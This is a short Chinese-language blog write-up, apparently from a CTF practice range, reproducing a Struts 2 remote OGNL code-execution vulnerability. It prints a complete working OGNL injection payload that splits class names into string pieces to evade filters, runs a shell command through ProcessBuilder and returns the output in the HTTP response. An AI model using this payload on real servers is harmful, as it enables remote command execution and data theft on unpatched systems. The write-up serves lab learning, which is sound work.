本次借助在线靶场春秋云境进行漏洞复现,感谢站长大佬免费提供学习资源。
靶标介绍
Apache Struts Showcase App 2.0.0 到 2.3.13(在 2.3.14.3 之前的 Struts 2 中使用)允许远程攻击者通过在调用重定向时未正确处理的精心设计的参数名称执行任意 OGNL 代码。
开启场景
话不多说,直接开始。访问靶标路径。
发现有一个输入框。
漏洞利用
直接展示payload:
%{#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#s=new java.util.Scanner((new java.lang.ProcessBuilder('cat /flag'.toString().split('\\s'))).start().getInputStream()).useDelimiter('\\AAAA'),#str=#s.hasNext()?#s.next():'',#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#resp.getWriter().println(#str),#resp.getWriter().flush(),#resp.getWriter().close()}
填入并提交。
这里的payload参考了free key大佬在另一个漏洞复现中使用的payload,虽然漏洞编号不同,但都是struts2漏洞,原理是相同的。
那么,附上链接 ↓
[漏洞复现]Apache Struts2/S2-005(CVE-2010-1870)_s2-005 cve struts2-CSDN博客
获得FLAG
成功获得flag。
漏洞复现,圆满成功。
感谢观看~